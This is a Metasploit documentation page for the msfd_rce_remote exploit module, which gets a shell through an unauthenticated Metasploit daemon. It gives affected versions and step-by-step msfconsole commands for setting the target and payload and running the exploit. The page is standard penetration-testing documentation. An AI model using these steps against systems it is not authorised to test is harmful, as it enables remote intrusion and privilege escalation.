Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/multi/misc/msfd_rce_remote.md
Views: 11623
Description
This module connects to the Metasploit msf daemon and uses the ruby interpreter to achieve a shell. This module can target remote systems if the daemon is exposed on a remote interface or it can be used for privilege escalation when the attacker has a foothold. If used as privilege escalation, port forwarding must be set up.
Vulnerable Application
Metasploit has a legacy method of providing remote access. The msf daemon provides no means of authentication and is therefore vulnerable against an attacker who has IP access to the daemon.
All versions of Metasploit are affected by this module, however testing has only been performed on the following targets:
Metasploit 5.0.0 on Ubuntu 16.04
Metasploit 4.16.51 on Windows 7
Source code and installers:
Verification Steps
Start the vulnerable service:
msfd -f -q -a 0.0.0.0
Start
msfconsole
Do:
use exploit/multi/misc/msfd_rce_remote
Do:
set RHOST [IP]
Do:
set RPORT [PORT]
(default:55554
)Do:
set PAYLOAD [PAYLOAD]
Do:
exploit
You should get a shell
Options
RHOST
Remote Host
RPORT
Remote port the vulnerable service is running at, default is 55554.